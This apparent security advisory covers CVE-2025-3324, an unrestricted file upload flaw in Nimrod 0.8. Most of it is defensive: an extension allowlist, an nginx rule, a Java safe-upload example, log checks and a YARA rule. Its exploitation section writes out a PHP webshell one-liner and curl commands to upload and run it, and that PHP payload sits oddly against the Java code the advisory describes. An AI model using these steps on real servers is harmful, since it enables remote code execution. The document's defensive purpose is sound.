How CVE-2025-3324 Works
This critical vulnerability in Nimrod 0.8 stems from improper file validation in FileRestController.java, allowing attackers to upload malicious files remotely. The flaw occurs when the application processes user-supplied `File` input without proper checks, enabling arbitrary file uploads. Attackers exploit this by uploading webshells or malicious scripts, leading to remote code execution (RCE). The CVSS 4.0 vector (AV:N/AC:L/PR:L/UI:N) indicates network-based exploitation with low attack complexity, low privileges required, and no user interaction. The public availability of an exploit increases its severity.
DailyCVE Form
Platform: Nimrod
Version: 0.8
Vulnerability: Unrestricted upload
Severity: Critical
Date: 04/07/2025
What Undercode Say:
Exploitation
1. Craft malicious file:
echo '<?php system($_GET["cmd"]); ?>' > shell.php
2. Upload via curl:
curl -X POST -F "[email protected]" http://target/upload
3. Execute payload:
curl http://target/uploads/shell.php?cmd=id
Protection
1. Input validation:
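// FilenameUtils is from Apache Commons IO; InvalidFileException is application-defined.
String name = file.getOriginalFilename();
// Lowercase the extension so "JPG" and "jpg" are treated alike; a missing name has no extension.
String ext = name == null ? "" : FilenameUtils.getExtension(name).toLowerCase(Locale.ROOT);
if (!Arrays.asList("jpg", "png").contains(ext)) {
    throw new InvalidFileException();
}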
2. Filesystem isolation:
location /uploads/ { deny all; }
3. Patch: Upgrade to Nimrod 0.9+.
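A fuller version of the input-validation step, as an added example that is not Nimrod's code and not from the original page: it combines the jpg/png allowlist with a magic-byte check and a server-generated filename inside the upload directory. The class and method names are hypothetical, the sample inputs are constructed, and Java 11+ is assumed.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.StandardOpenOption;
import java.util.Arrays;
import java.util.Locale;
import java.util.Map;
import java.util.UUID;

// Hypothetical helper: names are illustrative, not taken from Nimrod.
public final class SafeUpload {
    // Allowed extension -> leading magic bytes of that format.
    private static final Map<String, byte[]> ALLOWED = Map.of(
        "jpg", new byte[] {(byte) 0xFF, (byte) 0xD8, (byte) 0xFF},
        "png", new byte[] {(byte) 0x89, 'P', 'N', 'G', 0x0D, 0x0A, 0x1A, 0x0A});

    public static Path store(String clientName, InputStream body, Path uploadDir) throws IOException {
        if (clientName == null) throw new IOException("missing filename");
        int dot = clientName.lastIndexOf('.');
        String ext = dot < 0 ? "" : clientName.substring(dot + 1).toLowerCase(Locale.ROOT);
        byte[] magic = ALLOWED.get(ext);
        if (magic == null) throw new IOException("extension not allowed: " + ext);
        // The content must match the claimed type, not just the name.
        byte[] head = body.readNBytes(magic.length);
        if (!Arrays.equals(head, magic)) throw new IOException("content does not match ." + ext);
        // Server-generated name: the client-supplied name never reaches the filesystem.
        Path dir = uploadDir.toAbsolutePath().normalize();
        Path target = dir.resolve(UUID.randomUUID() + "." + ext).normalize();
        if (!target.startsWith(dir)) throw new IOException("path escapes upload directory");
        try (OutputStream out = Files.newOutputStream(target, StandardOpenOption.CREATE_NEW)) {
            out.write(head);       // bytes already consumed by the magic check
            body.transferTo(out);  // remainder of the upload
        }
        return target;
    }

    public static void main(String[] args) throws IOException {
        Path dir = Files.createTempDirectory("uploads");
        byte[] png = {(byte) 0x89, 'P', 'N', 'G', 0x0D, 0x0A, 0x1A, 0x0A, 0, 0}; // constructed sample
        System.out.println("stored: " + store("photo.PNG", new ByteArrayInputStream(png), dir));
        byte[] script = "<?php /* constructed non-image sample */ ?>".getBytes();
        for (String name : new String[] {"shell.php", "shell.php.png"}) {
            try { store(name, new ByteArrayInputStream(script), dir); }
            catch (IOException e) { System.out.println("rejected " + name + ": " + e.getMessage()); }
        }
    }
}
```

The second rejected case shows why the extension check alone is insufficient: a script renamed to end in .png passes the allowlist and is stopped only by the content check.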
Detection
1. Log analysis:
grep "POST /upload" /var/log/nginx/access.log | grep -Ev "\.(jpg|png)"
2. YARA rule:
rule webshell_upload {
    strings:
        $php = "<?php system("
    condition:
        $php
}
Analytics
- Attack surface: Exposed `/upload` endpoints.
- Exploitability: High (public PoC available).
- Mitigation complexity: Low (input validation).
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-3324